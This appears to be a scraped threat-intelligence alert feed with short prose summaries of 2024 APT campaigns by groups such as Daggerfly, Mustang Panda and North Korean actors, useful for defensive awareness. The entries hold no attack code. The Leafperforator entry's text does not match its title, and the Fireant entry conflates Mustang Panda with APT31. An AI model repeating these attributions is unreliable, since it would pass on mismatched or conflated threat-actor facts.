ALERTS APT


HOME  APT  BOTNET  CAMPAIGN  CRIME  CRYPTOCURRENCY  EXPLOIT  HACKING  GROUP  OPERATION  PHISHING  RANSOM  SPAM  VIRUS  VULNEREBILITY 

DATE

NAME

CATEGORY

SUBCATE

INFO

1.11.24

Daggerfly targets Taiwanese entities with new CloudScout Toolset ALERTS APT China-linked threat actor Daggerfly (also known as Evasive Panda) has been reported targeting a government entity and a religious organization in Taiwan with a previously undocumented post-compromise toolset called CloudScout. This toolset can retrieve data from various cloud services by leveraging stolen web session cookies. Additionally, CloudScout integrates seamlessly with MgBot, Evasive Panda's signature malware framework.

27.10.24

IcePeony: China-linked APT group targeting Southeast Asian governments ALERTS APT A recently identified APT group linked to China dubbed IcePeony has been detected conducting malware campaigns targeting government agencies and institutions in countries such as India, Mauritius, and Vietnam. The group's attack vector often involves SQL injection, leading to compromises via web shells and backdoors that utilize custom malware like "IceCache" to infiltrate networks.

27.10.24

Leafperforator APT group expands operations into the Middle East and Africa ALERTS APT Researchers recently published a warning about the Telegram account '@reserveplusbot', linked to a specific application and serving as a contact for technical support. The suspicious messages urged users to install a ZIP file that contains malware. The executable file inside is a variant of Meduza Stealer, which steals files and evades detection by modifying Microsoft Defender settings.

27.10.24

Threat actors associated with North Korea target tech job seekers with malware ALERTS APT The Contagious Interview campaign started in 2023 and is perpetuated by threat actors associated with North Korea. Recent activity has been observed that can be tied to this campaign with threat actors posing as job recruiters and luring victims into supposed interviews. Newer variants of previously used malware targeted individuals seeking jobs in the tech industry. The BeaverTail downloader and stealer is responsible for downloading the final InvisibleFerret backdoor payload. Researchers in Palo Alto Networks Unit 42 published a report with technical details of this activity.

27.10.24

VeilShell: A new threat from North Korea's Vedalia APT group ALERTS APT According to reports, threat actors linked to North Korea have been deploying a previously undocumented backdoor and remote access trojan (RAT) called VeilShell in a campaign targeting Southeast Asian countries. This activity is attributed to the Vedalia APT group (aka APT37, ScarCruft, Reaper)

27.10.24

CeranaKeeper APT Campaign ALERTS APT A recent CeranaKeeper APT campaign was observed by researchers. This China-linked threat actor targets government entities in Thailand, Myanmar, the Philippines, Japan, and Taiwan. The group continuously updates its tools, such as backdoors, to evade detection and exploits cloud services like Dropbox and OneDrive for custom solutions. They also leverage GitHub’s features to create a covert reverse shell, using the platform as their dedicated C2 server.

28.9.24

Louse APT Group launches malware campaign targeting Chinese entities

ALERTS

APT

The Louse APT group (also known as Patchwork and Dropping Elephant) has reportedly launched a malware campaign targeting Chinese entities. The attack vector involves a malicious LNK file, likely originating from a phishing email. This file executes a PowerShell script that downloads a decoy PDF and a malicious DLL, which is loaded using DLL sideloading techniques.

20.9

20.9.24

North Korean APT group Appleworm delivers PondRAT via poisoned Python packages

ALERTS

APT

An ongoing campaign involving poisoned Python packages delivering backdoors for Linux and macOS, dubbed PondRAT, has been reported. This campaign is believed to be driven by the North Korean APT group Appleworm (also known as AppleJeus, Citrine Sleet, Gleaming Pisces).

17.9.24

Fireant (APT31) unveils new tools in recent campaign against Asia-Pacific government entities

ALERTS

APT

The China-linked threat actor known as Fireant (also referred to as Mustang Panda or APT31) has recently been observed using new tools, including PUBLOAD, FDMTP, and PTSOCKET, in espionage attacks targeting government entities in the Asia-Pacific region.

13.9.24

VSCode abused by Chinese APT group

ALERTS

APT

Stately Taurus, a Chinese APT group that carries out cyber-espionage attacks, has abused Visual Studio Code software in espionage operations targeting government entities in Southeast Asia. This threat actor used VSCode’s embedded reverse shell feature to gain a foothold in target networks to execute arbitrary code and deliver additional payloads. The leveraged this mechanism to deliver malware, perform reconnaissance, and exfiltrate sensitive data. 

6.9.24

Tropic Trooper unleashes new China Chopper variant and Crowdoor loader

ALERTS

APT

Tropic Trooper, a Chinese-speaking APT group, has been reported targeting Middle Eastern government entities in a cyber espionage campaign. The attackers focused on systems related to human rights studies, using a new China Chopper variant deployed on a compromised Umbraco CMS server. The group employed DLL hijacking to load malicious payloads, including Crowdoor, a loader linked to the SparrowDoor backdoor.

20.8.24

Threat actor Damselfly conducts campaigns against the U.S. and Israel

ALERTS

APT

Damselfy (aka APT42, Charming Kitten) is a well established Iranian-based threat actor. The group has routinely attacked high value targets in both the U.S. and Israel. The main goal of these attacks is to steal credentials from entities such as NGOs and academic, government, and defense/military organizations to further Iran's own military and political ideals. Observed credential phishing campaigns use socially engineered lures and leverage links, fake sites and publicly available services like Dropbox, OneDrive, and those offered by Google.

3.8.24

Grayfly (aka APT41) threat group deploying ShadowPad and Cobalt Strike in a recent attacks

ALERTS

APT

As reported by researchers from Cisco Talos, Grayfly threat grup (also known as APT41) has been deploying ShadowPad malware and Cobalt Strike beacons in a recent distribution campaign observed in Taiwan. The attackers have been reported to exploit an old and vulnerable version of Microsoft Office IME file (imecmnt.exe) for the purpose of second-stage loader and payload execution.

2.8.24

DoNot APT Targeting Pakistani Android Mobile Users

ALERTS

APT

APT-C-35 (aka DoNot APT Group) has been active in conducting cyberattacks since at least 2013. Recently, they have targeted Pakistani Android mobile users. Their attacks typically start with phishing campaigns, leading to the deployment of Android malware known as StealJob. The primary objective of these threat actors is to access confidential information and intellectual property. Their techniques include encryption and fileless malware to evade detection.

27.7.24

Continuous espionage activities attributed to the Stonefly APT

ALERTS

APT

Symantec Security Response is aware of the recent joint alert from CISA, FBI and several other partners concerning a number of recent targeted activities attributed to the Stonefly APT group (also known as Andariel or DarkSeoul).

24.7.24

Grayfly is targeting and compromising multiple sectors

ALERTS

APT

Over the past few weeks, multiple  campaigns have been reported, carried out by the China-linked APT group Grayfly also known as APT41.

19.7.24

APT17 Campaign: New variants of 9002 RAT targeting Italian government entities

ALERTS

APT

A malware campaign by the APT17 group has been reported, distributing newer variants of 9002 RAT. The campaign specifically targets government entities and Italian companies. Users are lured with a link to a masqueraded Italian government domain, purportedly to download a Skype installer.

12.7.24

OilAlpha targets Arabic-speaking humanitarian NGOs in Yemen

ALERTS

APT

OilAlpha continues to target Arabic-speaking entities, as well as those interested in humanitarian organizations and NGOs operating in Yemen. According to reports, users are lured to a deceptive web portal that mimics the generic login interfaces of humanitarian organizations such as CARE International and the Norwegian Refugee Council, with the aim of stealing credentials.

9.7.24

Popular sticky-note installers trojanized to push malware

ALERTS

 

A recent report by (CTA) member Rapid7 has recently disclosed that popular sticky-note app 'Notezilla' installers have been trojanized in order to deliver malware.

2.7.24

Datebug APT continues to spread CapraRAT Android malware

ALERTS

APT

Renewed malicious activity associated to the Datebug APT (aka. Transparent Tribe or APT36) has been reported by researchers from Sentinel One. The threat actors continue to distribute Android malware known as CapraRAT via malicious Android .apk packages that mimic the appearance of legitimate apps. While the Datebug group has been known to target individuals within military and government sectors in India, this updated campaign leverages some new lures and attempts to expand its reach to users interested in mobile gaming, TikTok videos or weapon enthusiasts.

12.6.24

Fireant APT targets Vietnamese entities with LNK file malware campaign

ALERTS

APT

A malware campaign conducted by the Fireant (also known as Mustang Panda) APT group using Windows shortcut (LNK) files has been reported. The threat actor targets Vietnamese entities with lures related to the education sector and tax compliance. The attack vector involves phishing emails with archive (zip, rar) attachments containing malicious LNK files. The final payload is believed to be the PlugX RAT, which helps the attackers to remotely execute various commands on the compromised system.

8.6.24

Sticky Werewolf APT

ALERTS

APT

Sticky Werewolf is a threat group initially discovered over a year ago. The attackers have been known to target various organizations, most recently the pharmaceutical and aviation sectors. In their attacks the threat actors leverage malicious .lnk files disguised as .docx documents, decoy .pdf files, malicious Batch and AutoIT scripts, among others. The final payloads distributed in campaigns by Sticky Werewolf include various RAT variants and infostealers. Some examples of malware families spread in previous attacks are Rhadamanthys Stealer, Ozone RAT, MetaStealer, DarkTrack and NetWire.

8.6.24

UNC1151 APT targets the Ukrainian Ministry of Defence with malicious Excel campaign

ALERTS

APT

The UNC1151 APT group has been observed conducting a malware campaign utilizing a malicious Excel document. This group is known for targeting Eastern European countries. In the recent campaign, UNC1151 has been observed targeting the Ukrainian Ministry of Defence, utilizing a malicious Excel document as a lure. Upon execution of the Excel document, which contains an embedded VBA Macro, it drops an LNK and a DLL loader file. Subsequently, running the LNK file initiates the DLL loader, potentially leading to a suspected final payload including AgentTesla, Cobalt Strike beacons, and njRAT.

30.5.24

Datebug updating toolkits with Golang to be cross-platform

ALERTS

APT

APT group Datebug, in operation since 2013, has been observed updating their toolkit with a new data exfiltration tool written in Golang created with the goal of targeting APAC governments and defense sectors. The group utilizes phishing emails to lure recipients into opening an attached or linked malicious ZIP or ISO file which leads to the data exfiltration tool being installed.

30.5.24

Emergence of a new North Korean threat actor dubbed Moonstone Sleet

ALERTS

APT

A recent emergence in the threat landscape involves a new North Korean actor dubbed Moonstone Sleet. This actor has been detected engaging in various deceptive tactics, including the establishment of fake companies and job listings to lure potential targets. Additionally, they have been distributing trojanized versions of legitimate software tools, developing malicious games, and introducing a novel custom ransomware named FakePenny, comprising a loader and an encrypter. Their targets span individuals and organizations across sectors such as software and information technology, education, and defense industrial base.

25.5.24

Operation Diplomatic Specter: A Chinese APT campaign targeting political entities in multiple regions

ALERTS

APT

An ongoing campaign dubbed Operation Diplomatic Specter, targeting political entities in the Middle East, Africa, and Asia, has been reported. A Chinese APT group behind the campaign has been leveraging rare email exfiltration techniques against compromised servers.

23.5.24

Expanded operations of the Sharp Dragon APT

ALERTS

APT

As reported by Checkpoint, Sharp Dragon APT group (also formerly known as Sharp Panda) has been expanding its operations towards targets in Africa and in the Caribbean. Sharp Dragon is known to use large-scale phishing attacks, malicious RTF files, DLL-loaders but most recently also executable loaders disguises as documents. The threat group has also been reported to leverage CVE-2023-0669 RCE vulnerability affecting Fortra GoAnywhere in their attacks.

21.5.24

Springtail threat group uses new Linux backdoor in attacks

ALERTS

APT

In a newly released report, Symantec’s Threat Hunter Team sheds light on a recently discovered Linux backdoor developed by the North-Korean Springtail espionage group (aka Kimsuky). This group is linked to malware used in a recent campaign against organizations in South Korea. The campaign leveraged Trojanized software installation packages to deliver the backdoor.

3.5.24

NiceCurl and TameCat custom backdoors leveraged by Damselfly APT

ALERTS

APT

NiceCurl and TameCat are two custom backdoor variants recently leveraged in malicious campaigns attributed to the Damselfly APT (also known as APT42). These backdoors are reported to be delivered mostly by spear-phishing campaigns and used by the threat actors for the purpose of initial access to the targeted environments. While NiceCurl is a VBScript-based malware with capabilities to download and execute additional modules, TameCat backdoor is used to execute PowerShell and C# scripts as well as download additional arbitrary content.

25.4.24

SSLoad and Cobalt Strike leveraged in compromised "Contact Form" campaign

ALERTS

APT

A new loader has emerged called SSLoad, distinct from SLoad. Reports reveal a campaign where attackers were observed abusing and sending malicious links via contact forms. Clicking these links will download and install the SSLoad malware, then this DLL-based loader will deploy further backdoors and payloads, including a Cobalt Strike beacon to establish connection to the attacker's C2 servers to exfiltrate system and user information.

25.4.24

SpyNote campaign using Vietnam's National Public Service as bait

ALERTS

APT

SpyNote remote access trojan and its variants are proliferating globally, with groups and individuals employing various social engineering tactics to target mobile users. In a recent campaign, Symantec observed the threat (DỊCH VỤ CÔNG.apk) masquerading as an official app from Vietnam's National Public Service web platform, which offers extensive online public services for both citizens and businesses.

25.4.24

APT43 exploits Dropbox in TutorialRAT distribution campaign

ALERTS

APT

The APT43 group has been observed distributing TutorialRAT by actively exploiting Dropbox cloud storage as a base for their attacks to evade threat monitoring. This campaign appears to be an extension of APT43's BabyShark threat campaign and employs typical spear-phishing techniques, including the use of shortcut (LNK) files. TutorialRAT is a C#-based remote control program that functions as an infostealer, collecting and exfiltrating device and users' personal information .

22.4.24

Core Werewolf APT group targets Russian defense organizations in espionage campaign

ALERTS

APT

Espionage activity of the Core Werewolf APT group targeting Russian defense organizations was observed around mid-April. The attack utilized a malicious document as bait, purportedly meant for the presentation of state awards to special forces soldiers. However, the document is actually a 7zSFX archive containing a legitimate remote access tool, UltraVNC. Upon extraction, the malware creates copies of a decoy document and the UltraVNC executable, schedules tasks to run the executable, and establishes a connection to a designated server.

20.4.24

Coreid (aka Fin7) uses backdoor against US Automaker victims

ALERTS

APT

A recent report provided details of activity by the Coreid (aka Fin7) threat group in which victims in the US automaker industry were targeted. According to the report, the campaign leveraged spearphishing emails against selected targets by socially engineering content related to free online scanning tools. The victim would be coerced into following a link to a typosquatted domain related to a legitimate online scanner.

20.4.24

APT Group exploits Web3 gaming hype in campaign for cryptocurrency earnings

ALERTS

APT

A campaign centered around imitating web3 gaming projects has been observed, likely operated by a Russian-language APT group aiming for potential cryptocurrency earnings by leveraging the allure of blockchain-based gaming. Users are enticed to visit the main webpages of these projects to download the software. Once installed, the software further infects devices with infostealer malware. Depending on the operating system, the malware variants include Atomic macOS Stealer (AMOS), Stealc, Rhadamanthys, or RisePro.

8.4.24

African based telecommunications organizations targeted by Iranian Seedworm group

ALERTS

APT

The Symantec Threat Hunter Team, part of Broadcom, observed a recent campaign by the Seedworm threat actor group, targeting telecommunications organizations in North and East Africa. This activity, which occurred in November 2023, leveraged some new and some existing features previously attributed to Seedworm.

27.3.24

Stately Taurus APT Campaign Targeting Asian Countries

ALERTS

APT

Researchers observed a recent Stately Taurus (aka Mustang Panda) APT campaign during an ASEAN-Australia Special Summit held just this month targeting Asian countries. Two malware packages were created and deployed for this recent attack - one is a ZIP format and the other one is a SCR file. Both of these packages' main goal is to deploy malware with the use of abused copies of applications from known software developers like QFX Sofware Corporation and Electronic Arts, Inc..